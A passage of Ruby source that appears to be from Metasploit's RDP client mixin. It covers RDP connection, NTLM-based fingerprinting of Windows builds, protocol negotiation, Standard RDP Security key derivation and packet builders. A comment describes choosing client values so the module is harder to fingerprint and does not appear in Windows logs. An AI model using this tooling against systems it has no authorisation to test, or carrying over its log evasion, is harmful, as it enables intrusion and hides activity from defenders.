  97 |     PAKID_CORE_SERVER_CAPABILITY   = 0x5350
  98 |     PAKID_CORE_CLIENTID_CONFIRM    = 0x4343
  99 |     PAKID_CORE_CLIENT_NAME         = 0x434e
 100 |     PAKID_CORE_DEVICELIST_ANNOUNCE = 0x4441
 101 |   end
 102 | 
 103 |   def rdp_connect
 104 |     self.rdp_sock = connect(false)
 105 |     self.rdp_sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
 106 |   end
 107 | 
 108 | 
 109 |   def rdp_disconnect
 110 |     disconnect(self.rdp_sock)
 111 |     self.rdp_sock = nil
 112 |   end
 113 | 
 114 |   def rdp_send(data)
 115 |     self.rdp_sock.put(data)
 116 |   end
 117 | 
 118 |   def rdp_recv(length = -1, timeout = 5)
 119 |     res = self.rdp_sock.get_once(length, timeout)
 120 |     raise RdpCommunicationError unless res # nil due to a timeout
 121 | 
 122 |     res
 123 |   rescue EOFError
 124 |     raise RdpCommunicationError
 125 |   end
 126 | 
 127 |   def rdp_send_recv(data)
 128 |     rdp_send(data)
 129 |     rdp_recv
 130 |   end
 131 | 
 132 |   # Connect and perform fingerprinting of the RDP service
 133 |   #
 134 |   # Note: NLA is required to detect the product_version
 135 |   #
 136 |   # @return [Boolean] Is service RDP
 137 |   # @return [Hash] Version information
 138 |   def rdp_fingerprint
 139 |     peer_info = {}
 140 |     # warning: if rdp_check_protocol starts handling NLA, this will need to be updated
 141 |     is_rdp, server_selected_proto = rdp_check_protocol(RDPConstants::PROTOCOL_SSL | RDPConstants::PROTOCOL_HYBRID | RDPConstants::PROTOCOL_HYBRID_EX)
 142 |     return false, nil unless is_rdp
 143 |     return true, peer_info unless [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
 144 | 
 145 |     swap_sock_plain_to_ssl
 146 |     ntlm_negotiate_blob = ''  # see: https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/
 147 |     ntlm_negotiate_blob << "\x30\x37\xa0\x03\x02\x01\x60\xa1\x30\x30\x2e\x30\x2c\xa0\x2a\x04\x28"
 148 |     ntlm_negotiate_blob << "\x4e\x54\x4c\x4d\x53\x53\x50\x00"  #  Identifier - NTLMSSP
 149 |     ntlm_negotiate_blob << "\x01\x00\x00\x00"                  #  Type: NTLMSSP Negotiate - 01
 150 |     ntlm_negotiate_blob << "\xb7\x82\x08\xe2"                  #  Flags (NEGOTIATE_SIGN_ALWAYS | NEGOTIATE_NTLM | NEGOTIATE_SIGN | REQUEST_TARGET | NEGOTIATE_UNICODE)
 151 |     ntlm_negotiate_blob << "\x00\x00"                          #  DomainNameLen
 152 |     ntlm_negotiate_blob << "\x00\x00"                          #  DomainNameMaxLen
 153 |     ntlm_negotiate_blob << "\x00\x00\x00\x00"                  #  DomainNameBufferOffset
 154 |     ntlm_negotiate_blob << "\x00\x00"                          #  WorkstationLen
 155 |     ntlm_negotiate_blob << "\x00\x00"                          #  WorkstationMaxLen
 156 |     ntlm_negotiate_blob << "\x00\x00\x00\x00"                  #  WorkstationBufferOffset
 157 |     ntlm_negotiate_blob << "\x0a"                              #  ProductMajorVersion = 10
 158 |     ntlm_negotiate_blob << "\x00"                              #  ProductMinorVersion = 0
 159 |     ntlm_negotiate_blob << "\x63\x45"                          #  ProductBuild = 0x4563 = 17763
 160 |     ntlm_negotiate_blob << "\x00\x00\x00"                      #  Reserved
 161 |     ntlm_negotiate_blob << "\x0f"                              #  NTLMRevision = 5 = NTLMSSP_REVISION_W2K3
 162 |     resp = rdp_send_recv(ntlm_negotiate_blob)
 163 | 
 164 |     ntlmssp_start = resp.index('NTLMSSP')
 165 |     if ntlmssp_start
 166 |       ntlmssp = NTLM_MESSAGE::parse(resp[ntlmssp_start..-1])
 167 |       version = ntlmssp.padding.bytes
 168 |       peer_info[:product_version] = "#{version[0]}.#{version[1]}.#{version[2] | (version[3] << 8)}"
 169 |     end
 170 | 
 171 |     return is_rdp, peer_info
 172 |   end
 173 | 
 174 |   def rdp_dispatch_loop
 175 |     while rdp_sock do
 176 |       rdp_handle_packet(rdp_recv)
 177 |     end
 178 |   end
 179 | 
 180 |   def rdp_create_channel_msg(chan_user_id, chan_id, data, flags = 3, data_length = nil)
 181 |     data_length ||= data.length
 182 | 
 183 |     pdu = [
 184 |       [25 << 2].pack('C'), # MCS send data request structure, choice 25
 185 |       [self.rdp_user_id, chan_id].pack('S>S>'), # MCS send data request structure, choice 25
 186 |       "\x70", # Wut (security header)
 187 |       per_data(
 188 |         [data_length].pack('<L'),
 189 |         [flags].pack('<L'),
 190 |         data
 191 |       )
 192 |     ].join('')
 193 | 
 194 |     build_data_tpdu(pdu)
 195 |   end
 196 | 
 197 |   def rdp_send_channel(chan_user_id, chan_id, data, flags = 3, data_length = nil)
 198 |     tpkt = rdp_create_channel_msg(chan_user_id, chan_id, data, flags, data_length)
 199 |     rdp_send(tpkt)
 200 |   end
 201 | 
 202 |   def rdp_terminate
 203 |     body = "\x21\x80" # user requested disconnect provider ultimatum
 204 | 
 205 |     rdp_send(build_data_tpdu(body))
 206 |   end
 207 | 
 208 |   # Connect and detect security protocol
 209 |   #
 210 |   # Note: NLA is detected but not supported yet
 211 |   #
 212 |   # @return [Boolean] Is service RDP
 213 |   # @return [RDPConstants] Protocol supported
 214 |   def rdp_check_protocol(req_proto = RDPConstants::PROTOCOL_SSL)
 215 |     if datastore['RDP_USER']
 216 |       @user_name = datastore['RDP_USER']
 217 |     else
 218 |       @user_name = Rex::Text.rand_text_alpha(7)
 219 |     end
 220 | 
 221 |     if datastore['RDP_DOMAIN']
 222 |       @domain = datastore['RDP_DOMAIN']
 223 |     else
 224 |       @domain = Rex::Text.rand_text_alpha(7)
 225 |     end
 226 | 
 227 |     if datastore['RDP_CLIENT_NAME']
 228 |       @computer_name = datastore['RDP_CLIENT_NAME']
 229 |     else
 230 |       @computer_name = Rex::Text.rand_text_alpha(15)
 231 |     end
 232 | 
 233 |     @ip_address = datastore['RDP_CLIENT_IP']
 234 | 
 235 |     # code to check if RDP is open or not
 236 |     vprint_status("Verifying RDP protocol...")
 237 | 
 238 |     vprint_status("Attempting to connect using TLS security")
 239 |     res = rdp_send_recv(pdu_negotiation_request(@user_name, req_proto))
 240 | 
 241 |     # return true if the response is a X.224 Connect Confirm
 242 |     # We can't use a check for RDP Negotiation Response because WinXP excludes it
 243 |     if res
 244 |       result, err_msg = rdp_parse_negotiation_response(res)
 245 |       return true, result if result
 246 | 
 247 |       # No current support for NLA, nothing to do here
 248 |       return true, RDPConstants::PROTOCOL_HYBRID if err_msg == 'HYBRID_REQUIRED_BY_SERVER'
 249 | 
 250 |       if err_msg == "Negotiation Response packet too short."
 251 |         vprint_status("Attempt to connect with TLS failed but looks like the target is Windows XP")
 252 |       else
 253 |         vprint_status("Attempt to connect with TLS failed with error: #{err_msg}")
 254 |       end
 255 | 
 256 |       if ["SSL_NOT_ALLOWED_BY_SERVER", "Negotiation Response packet too short."].include? err_msg
 257 |         # This happens if the server is configured to ONLY permit RDP Security
 258 |         vprint_status("Attempting to connect using Standard RDP security")
 259 |         rdp_disconnect
 260 |         rdp_connect
 261 |         res = rdp_send_recv(pdu_negotiation_request(@user_name, RDPConstants::PROTOCOL_RDP))
 262 | 
 263 |         if res
 264 |           result, err_msg = rdp_parse_negotiation_response(res)
 265 |           return true, result if result
 266 | 
 267 |           # Windows XP doesn't return the standard Negotiation Response packet
 268 |           # but we at least know this was RDP since the packet contained a
 269 |           # Connect-Confirm response (0xd0).
 270 |           if err_msg == "Negotiation Response packet too short."
 271 |             return true, RDPConstants::PROTOCOL_RDP
 272 |           end
 273 | 
 274 |           vprint_status("Attempt to connect with Standard RDP failed with error #{err_msg}")
 275 |         end
 276 |       end
 277 |     end
 278 | 
 279 |     return false, 0
 280 |   end
 281 | 
 282 |   # Negotiate security protocol and begin session building
 283 |   #
 284 |   # @return [Boolean] success
 285 |   def rdp_negotiate_security(channels, req_proto = RDPConstants::PROTOCOL_SSL)
 286 |     if req_proto == RDPConstants::PROTOCOL_SSL
 287 |       swap_sock_plain_to_ssl
 288 |       res = rdp_send_recv(pdu_connect_initial(channels, req_proto, @computer_name))
 289 |     elsif req_proto == RDPConstants::PROTOCOL_RDP
 290 |       res = rdp_send_recv(pdu_connect_initial(channels, req_proto, @computer_name))
 291 |       rsmod, rsexp, _rsran, server_rand, bitlen = rdp_parse_connect_response(res)
 292 |     elsif [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(req_proto)
 293 |       vprint_status("NLA Security protocol unsupported at this time.")
 294 |       return false
 295 |     else
 296 |       vprint_error("Unknown protocol requested (#{req_proto}).")
 297 |       return false
 298 |     end
 299 | 
 300 |     # erect domain and attach user
 301 |     vprint_status("Sending erect domain request")
 302 |     rdp_send(pdu_erect_domain_request)
 303 |     res = rdp_send_recv(pdu_attach_user_request)
 304 | 
 305 |     self.rdp_user_id = res[9, 2].unpack("n").first
 306 | 
 307 |     # send channel requests
 308 |     [1009, 1003, 1004, 1005, 1006, 1007, 1008].each do |chan|
 309 |       rdp_send_recv(pdu_channel_join_request(self.rdp_user_id, chan))
 310 |     end
 311 | 
 312 |     if req_proto == RDPConstants::PROTOCOL_RDP
 313 |       @rdp_sec = true
 314 | 
 315 |       # 5.3.4 Client Random Value
 316 |       client_rand = ''
 317 |       32.times { client_rand << rand(0..255) }
 318 |       rcran = bytes_to_bignum(client_rand)
 319 | 
 320 |       vprint_status("Sending security exchange PDU")
 321 |       rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))
 322 | 
 323 |       # We aren't decrypting anything at this point. Leave the variables here
 324 |       # to make it easier to understand in the future.
 325 |       rc4encstart, _rc4decstart, @hmackey, _sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)
 326 | 
 327 |       @rc4enckey = RC4.new(rc4encstart)
 328 |     end
 329 | 
 330 |     return true
 331 |   end
 332 | 
 333 |   # Finish building session after all security is negotiated
 334 |   def rdp_establish_session
 335 |     vprint_status("Sending client info PDU")
 336 |     res = rdp_send_recv(rdp_build_pkt(pdu_client_info(@user_name, @domain, @ip_address), "\x03\xeb", true))
 337 |     vprint_status("Received License packet")
 338 | 
 339 |     # Windows XP sometimes sends a very large license packet. This is likely
 340 |     # some form of license error. When it does this it doesn't send a Server
 341 |     # Demand packet. If we wait on one we will time out here and error. We
 342 |     # can still successfully check for vulnerability anyway.
 343 |     if res.length <= 34
 344 |       vprint_status("Waiting for Server Demand packet")
 345 |       _res = rdp_recv
 346 |       vprint_status("Received Server Demand packet")
 347 |     end
 348 | 
 349 |     vprint_status("Sending client confirm active PDU")
 350 |     rdp_send(rdp_build_pkt(pdu_client_confirm_active))
 351 | 
 352 |     vprint_status("Sending client synchronize PDU")
 353 |     vprint_status("Sending client control cooperate PDU")
 354 |     # Unsure why we're using 1009 here but it works.
 355 |     synch = rdp_build_pkt(pdu_client_synchronize(1009))
 356 |     coop = rdp_build_pkt(pdu_client_control_cooperate)
 357 |     rdp_send(synch + coop)
 358 | 
 359 |     vprint_status("Sending client control request control PDU")
 360 |     rdp_send(rdp_build_pkt(pdu_client_control_request))
 361 | 
 362 |     vprint_status("Sending client input sychronize PDU")
 363 |     rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize))
 364 | 
 365 |     vprint_status("Sending client font list PDU")
 366 |     rdp_send(rdp_build_pkt(pdu_client_font_list))
 367 |   end
 368 | 
 369 |   #
 370 |   # Protocol parsers
 371 |   #
 372 | 
 373 |   # Parse RDP Negotiation Data - 2.2.1.2
 374 |   # Reference: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/13757f8f-66db-4273-9d2c-385c33b1e483
 375 |   # @return [String, nil] String representation of the Selected Protocol or nil on failure
 376 |   # @return [String] Error message
 377 |   def rdp_parse_negotiation_response(data)
 378 |     return false, "Response is not an RDP Negotiation Response packet." unless data.match("\x03\x00\x00..\xd0")
 379 |     return false, "Negotiation Response packet too short." if data.length < 19
 380 | 
 381 |     response_code = data[11].unpack("C")[0]
 382 | 
 383 |     if response_code == 2  # TYPE_RDP_NEG_RSP
 384 |       # RDP Negotiation Response - 2.2.1.2.1
 385 |       server_selected_proto = data[15..18].unpack("L<")[0]
 386 | 
 387 |       proto_label = RDPConstants::RDP_NEG_PROTOCOL[server_selected_proto]
 388 |       return server_selected_proto, nil if proto_label
 389 | 
 390 |       return nil, "Unknown protocol in Negotiation Response: #{server_selected_proto}"
 391 | 
 392 |     elsif response_code == 3  # TYPE_RDP_NEG_FAILURE
 393 |       # RDP Negotiation Failure - 2.2.1.2.2
 394 |       failure_code = data[15..18].unpack("L<")[0]
 395 |       return nil, RDPConstants::RDP_NEG_FAILURE[failure_code]
 396 |     else
 397 |       return nil, "Unknown Negotiation Response code: #{response_code}"
 398 |     end
 399 |   end
 400 | 
 401 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c
 402 |   # Parse Server MCS Connect Response PUD - 2.2.1.4
 403 |   def rdp_parse_connect_response(pkt)
 404 |     ptr = 0
 405 |     rdp_pkt = pkt[0x49..pkt.length]
 406 | 
 407 |     while ptr < rdp_pkt.length
 408 |       header_type = rdp_pkt[ptr..ptr + 1]
 409 |       header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0]
 410 | 
 411 |       if header_type == "\x02\x0c"
 412 | 
 413 |         server_random = rdp_pkt[ptr + 20..ptr + 51]
 414 |         public_exponent = rdp_pkt[ptr + 84..ptr + 87]
 415 | 
 416 |         rsa_magic = rdp_pkt[ptr + 68..ptr + 71]
 417 |         if rsa_magic != "RSA1"
 418 |           print_error("Server cert isn't RSA, this scenario isn't supported (yet).")
 419 |           raise RdpCommunicationError
 420 |         end
 421 | 
 422 |         bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8
 423 |         modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen]
 424 |       end
 425 | 
 426 |       ptr += header_length
 427 |     end
 428 | 
 429 |     # vprint_status("SERVER_MODULUS: #{bin_to_hex(modulus)}")
 430 |     # vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}")
 431 |     # vprint_status("SERVER_RANDOM: #{bin_to_hex(server_random)}")
 432 | 
 433 |     rsmod = bytes_to_bignum(modulus)
 434 |     rsexp = bytes_to_bignum(public_exponent)
 435 |     rsran = bytes_to_bignum(server_random)
 436 | 
 437 |     # vprint_status("MODULUS  = #{bin_to_hex(modulus)} - #{rsmod.to_s}")
 438 |     # vprint_status("EXPONENT = #{bin_to_hex(public_exponent)} - #{rsexp.to_s}")
 439 |     # vprint_status("SVRANDOM = #{bin_to_hex(server_random)} - #{rsran.to_s}")
 440 | 
 441 |     return rsmod, rsexp, rsran, server_random, bitlen
 442 |   end
 443 | 
 444 |   #
 445 |   # Encryption: Standard RDP Security
 446 |   #
 447 | 
 448 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
 449 |   # mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
 450 |   # data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
 451 |   # hmac = rdp_hmac(mac_salt_key, data_content) # == hexlified: "22d5aeb486994a0c785dc929a2855923"
 452 |   def rdp_hmac(mac_salt_key, data_content)
 453 |     sha1 = Digest::SHA1.new
 454 |     md5 = Digest::MD5.new
 455 | 
 456 |     pad1 = "\x36" * 40
 457 |     pad2 = "\x5c" * 48
 458 | 
 459 |     sha1 << mac_salt_key
 460 |     sha1 << pad1
 461 |     sha1 << [data_content.length].pack('<L')
 462 |     sha1 << data_content
 463 | 
 464 |     md5 << mac_salt_key
 465 |     md5 << pad2
 466 |     md5 << [sha1.hexdigest].pack("H*")
 467 | 
 468 |     [md5.hexdigest].pack("H*")
 469 |   end
 470 | 
 471 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f
 472 |   #  SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))
 473 |   def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes)
 474 |     sha1 = Digest::SHA1.new
 475 |     md5 = Digest::MD5.new
 476 | 
 477 |     sha1 << i_bytes
 478 |     sha1 << s_bytes
 479 |     sha1 << client_random_bytes
 480 |     sha1 << server_random_bytes
 481 | 
 482 |     md5 << s_bytes
 483 |     md5 << [sha1.hexdigest].pack("H*")
 484 | 
 485 |     [md5.hexdigest].pack("H*")
 486 |   end
 487 | 
 488 |   #  FinalHash(K) = MD5(K + ClientRandom + ServerRandom)
 489 |   def rdp_final_hash(k, client_random_bytes, server_random_bytes)
 490 |     md5 = Digest::MD5.new
 491 | 
 492 |     md5 << k
 493 |     md5 << client_random_bytes
 494 |     md5 << server_random_bytes
 495 | 
 496 |     [md5.hexdigest].pack("H*")
 497 |   end
 498 | 
 499 |   def rdp_calculate_rc4_keys(client_random, server_random)
 500 |     # preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom)
 501 |     preMasterSecret = client_random[0..23] + server_random[0..23]
 502 | 
 503 |     # PreMasterHash(I) = SaltedHash(preMasterSecret, I)
 504 |     # MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343)
 505 |     masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) +  rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random)
 506 | 
 507 |     # MasterHash(I) = SaltedHash(MasterSecret, I)
 508 |     # SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A)
 509 |     sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) +  rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random)
 510 | 
 511 |     # InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob))
 512 |     initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)
 513 | 
 514 |     # InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob))
 515 |     initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)
 516 | 
 517 |     mac_key = sessionKeyBlob[0..15]
 518 | 
 519 |     return initialClientEncryptKey128, initialClientDecryptKey128, mac_key, sessionKeyBlob
 520 |   end
 521 | 
 522 |   def rsa_encrypt(bignum, rsexp, rsmod)
 523 |     (bignum ** rsexp) % rsmod
 524 |   end
 525 | 
 526 |   def rdp_rc4_crypt(rc4obj, data)
 527 |     rc4obj.encrypt(data)
 528 |   end
 529 | 
 530 |   def bytes_to_bignum(bytes_val, order = "little")
 531 |     bytes = bin_to_hex(bytes_val)
 532 |     if order == "little"
 533 |       bytes = bytes.scan(/../).reverse.join('')
 534 |     end
 535 |     s = "0x" + bytes
 536 |     s.to_i(16)
 537 |   end
 538 | 
 539 |   # https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
 540 |   def int_to_bytestring( int_val, num_chars = nil )
 541 |     unless num_chars
 542 |       bits_needed = Math.log(int_val) / Math.log(2)
 543 |       num_chars = ( bits_needed / 8.0 ).ceil
 544 |     end
 545 |     if pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[num_chars]
 546 |       [int_val].pack(pack_code)
 547 |     else
 548 |       a = (0..(num_chars)).map{ |i|
 549 |         (( int_val >> i*8 ) & 0xFF ).chr
 550 |       }.join
 551 |       a[0..-2] # seems legit lol
 552 |     end
 553 |   end
 554 | 
 555 |   def bin_to_hex(str_val)
 556 |     str_val.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
 557 |   end
 558 | 
 559 | 
 560 |   #
 561 |   # Protocol Data Unit definitions and helpers
 562 |   #
 563 | 
 564 |   # Build the X.224 packet, encrypt with Standard RDP Security as needed
 565 |   # default channel_id = 0x03eb = 1003
 566 |   def rdp_build_pkt(data, channel_id = "\x03\xeb", client_info = false)
 567 |     flags = 0
 568 |     flags |= 0b1000 if @rdp_sec       # Set SEC_ENCRYPT
 569 |     flags |= 0b1000000 if client_info # Set SEC_INFO_PKT
 570 | 
 571 |     pdu = ""
 572 | 
 573 |     # TS_SECURITY_HEADER - 2.2.8.1.1.2.1
 574 |     # Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs
 575 |     if client_info || @rdp_sec
 576 |       pdu << [flags].pack("S<")  # flags  "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
 577 |       pdu << "\x00\x00"          # flagsHi
 578 |     end
 579 | 
 580 |     if @rdp_sec
 581 |       # Encrypt the payload with RDP Standard Encryption
 582 |       pdu << rdp_hmac(@hmackey, data)[0..7]
 583 |       pdu << rdp_rc4_crypt(@rc4enckey, data)
 584 |     else
 585 |       pdu << data
 586 |     end
 587 | 
 588 |     user_data_len = pdu.length
 589 |     udl_with_flag = 0x8000 | user_data_len
 590 | 
 591 |     pkt =  "\x64"      # sendDataRequest
 592 |     pkt << "\x00\x08"  # intiator userId .. TODO: for a functional client this isn't static
 593 |     pkt << channel_id  # channelId
 594 |     pkt << "\x70"      # dataPriority
 595 |     pkt << [udl_with_flag].pack("S>")
 596 |     pkt << pdu
 597 | 
 598 |     build_data_tpdu(pkt)
 599 |   end
 600 | 
 601 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
 602 |   # Virtual Channel PDU 2.2.6.1
 603 |   def build_virtual_channel_pdu(flags, data)
 604 |     data_len = data.length
 605 | 
 606 |     [data_len].pack("L<") + # length
 607 |       [flags].pack("L<") +  # flags
 608 |       data
 609 |   end
 610 | 
 611 |   # Builds x.224 Data (DT) TPDU - Section 13.7
 612 |   def build_data_tpdu(data)
 613 |     tpkt_length = data.length + 7
 614 | 
 615 |     "\x03\x00" +                 # TPKT Header version 03, reserved 0
 616 |       [tpkt_length].pack("S>") + # TPKT length
 617 |       "\x02\xf0\x80" +           # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission)
 618 |       data
 619 |   end
 620 | 
 621 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
 622 |   # Client X.224 Connect Request PDU - 2.2.1.1
 623 |   def pdu_negotiation_request(user_name = "", requested_protocols = 0)
 624 |     # Blank username is ok, nil = random
 625 |     user_name = Rex::Text.rand_text_alpha(12) if user_name.nil?
 626 |     tpkt_len = user_name.length + 38
 627 |     x224_len = user_name.length + 33
 628 | 
 629 |     "\x03\x00" +              # TPKT Header version 03, reserved 0
 630 |       [tpkt_len].pack("S>") + # TPKT length: 43
 631 |       [x224_len].pack("C") +  # X.224 LengthIndicator
 632 |       "\xe0" +        # X.224 Type: Connect Request
 633 |       "\x00\x00" +    # dst reference
 634 |       "\x00\x00" +    # src reference
 635 |       "\x00" +        # class and options
 636 |       # cookie - literal 'Cookie: mstshash='
 637 |       "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" +
 638 |       user_name +     # Identifier "username"
 639 |       "\x0d\x0a" +    # cookie terminator
 640 |       "\x01\x00" +    # Type: RDP Negotiation Request ( 0x01 )
 641 |       "\x08\x00" +    # Length
 642 |       [requested_protocols].pack('L<') # requestedProtocols
 643 |   end
 644 | 
 645 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
 646 |   def pdu_connect_initial(channels, selected_proto = 0, host_name = "rdesktop")
 647 |     # After negotiating TLS or NLA the connectInitial packet needs to include the
 648 |     # protocol selection that the server indicated in its Negotiation Response
 649 | 
 650 |     pdu = [
 651 |       "\x7f\x65",        # T.125 Connect-Initial (BER: Application 101)
 652 |       ber_data(
 653 |         "\x04\x01\x01",    # CallingDomainSelector: 1 (BER: OctetString)
 654 |         "\x04\x01\x01",    # CalledDomainSelector: 1 (BER: OctetString)
 655 |         "\x01\x01\xff",    # UpwaredFlag: True (BER: boolean)
 656 | 
 657 |         # TargetParamenters
 658 |         encode_domain_selector(
 659 |           max_chan_ids: 0x22,
 660 |           max_user_ids: 0x2
 661 |         ),
 662 |         # MinimumParameters
 663 |         encode_domain_selector(
 664 |           max_chan_ids: 0x1,
 665 |           max_user_ids: 0x1,
 666 |           max_token_ids: 0x1,
 667 |           max_mcspdu_size: 0x0420
 668 |         ),
 669 |         # MaximumParameters
 670 |         encode_domain_selector(
 671 |           max_chan_ids: 0xffff,
 672 |           max_user_ids: 0xfc17,
 673 |           max_token_ids: 0xffff
 674 |         ),
 675 |         # UserData
 676 |         ber_octet_string(
 677 |           # T.124 GCC Connection Data (ConnectData)- PER Encoding used
 678 |           per_object(oid(0, 0, 20, 124, 0, 1)),
 679 |           per_data(
 680 |             conf_create_req(),
 681 |             per_data(
 682 |               cs_core_data(client_name: host_name, selected_proto: selected_proto),
 683 |               cs_cluster_data(),
 684 |               cs_security_data(),
 685 |               cs_network_data(channels)
 686 |             )
 687 |           )
 688 |         )
 689 |       )
 690 |     ].join('')
 691 | 
 692 |     build_data_tpdu(pdu)
 693 |   end
 694 | 
 695 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
 696 |   # Client MCS Erect Domain Request PDU - 2.2.1.5
 697 |   def pdu_erect_domain_request
 698 |     pdu =
 699 |       "\x04" +       # T.125 ErectDomainRequest
 700 |       "\x01\x00" +   # subHeight - length 1, value 0
 701 |       "\x01\x00"     # subInterval - length 1, value 0
 702 | 
 703 |     build_data_tpdu(pdu)
 704 |   end
 705 | 
 706 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\
 707 |   # Client MCS Attach User Request PDU - 2.2.1.6
 708 |   def pdu_attach_user_request
 709 |     pdu = "\x28"  # T.125 AttachUserRequest
 710 | 
 711 |     build_data_tpdu(pdu)
 712 |   end
 713 | 
 714 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
 715 |   # Client MCS Channel Join Request PDU -2.2.1.8
 716 |   def pdu_channel_join_request(user1, channel_id)
 717 |     pdu =
 718 |       "\x38" + # T.125 ChannelJoinRequest
 719 |       [user1, channel_id].pack("nn")
 720 | 
 721 |     build_data_tpdu(pdu)
 722 |   end
 723 | 
 724 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
 725 |   # Client Security Exchange PDU - 2.2.1.10
 726 |   def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
 727 |     encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
 728 |     encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
 729 | 
 730 |     bitlen += 8 # Pad with size of TS_SECURITY_PACKET header
 731 | 
 732 |     userdata_length = 8 + bitlen
 733 |     userdata_length_low = userdata_length & 0xFF
 734 |     userdata_length_high = userdata_length / 256
 735 |     flags = 0x80 | userdata_length_high
 736 | 
 737 |     pdu =
 738 |       "\x64" +            # T.125 sendDataRequest
 739 |       "\x00\x08" +        # intiator userId
 740 |       "\x03\xeb" +        # channelId = 1003
 741 |       "\x70" +            # dataPriority = high, segmentation = begin | end
 742 |       [flags].pack("C") +
 743 |       [userdata_length_low].pack("C") + # UserData length
 744 |       # TS_SECURITY_PACKET - 2.2.1.10.1
 745 |       "\x01\x00" +           # securityHeader flags
 746 |       "\x00\x00" +           # securityHeader flagsHi
 747 |       [bitlen].pack("L<") +  # TS_ length
 748 |       encrypted_rcran +      # encryptedClientRandom - 64 bytes
 749 |       "\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present)
 750 | 
 751 |     build_data_tpdu(pdu)
 752 |   end
 753 | 
 754 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
 755 |   # TS_INFO_PACKET - 2.2.1.11.1.1
 756 |   def pdu_client_info(user_name, domain_name = "", ip_address = "")
 757 |     # Max len for 4.0/6.0 servers is 44 bytes including terminator
 758 |     # Max len for all other versions is 512 including terminator
 759 |     # We're going to limit to 44 (21 chars + null -> unicode) here.
 760 |     # Blank username is ok, nil = random
 761 |     user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
 762 |     user_unicode = Rex::Text.to_unicode(user_name[0..20], 'utf-16le')
 763 |     uname_len = user_unicode.length
 764 | 
 765 |     # Domain can can be, and for rdesktop typically is, empty.
 766 |     # Max len for 4.0/5.0 servers is 52 including terminator
 767 |     # Max len for all other versions is 512 including terminator
 768 |     # We're going to limit to 52 (25 chars + null -> unicode) here.
 769 |     domain_unicode = Rex::Text.to_unicode(domain_name[0..24], 'utf-16le')
 770 |     domain_len = domain_unicode.length
 771 | 
 772 |     # This address value is primarily used to reduce the fields by which this
 773 |     # module can be fingerprinted. It doesn't show up in Windows logs.
 774 |     # clientAddress + null terminator
 775 |     ip_unicode = Rex::Text.to_unicode(ip_address, 'utf-16le') + "\x00\x00"
 776 |     ip_len = ip_unicode.length
 777 | 
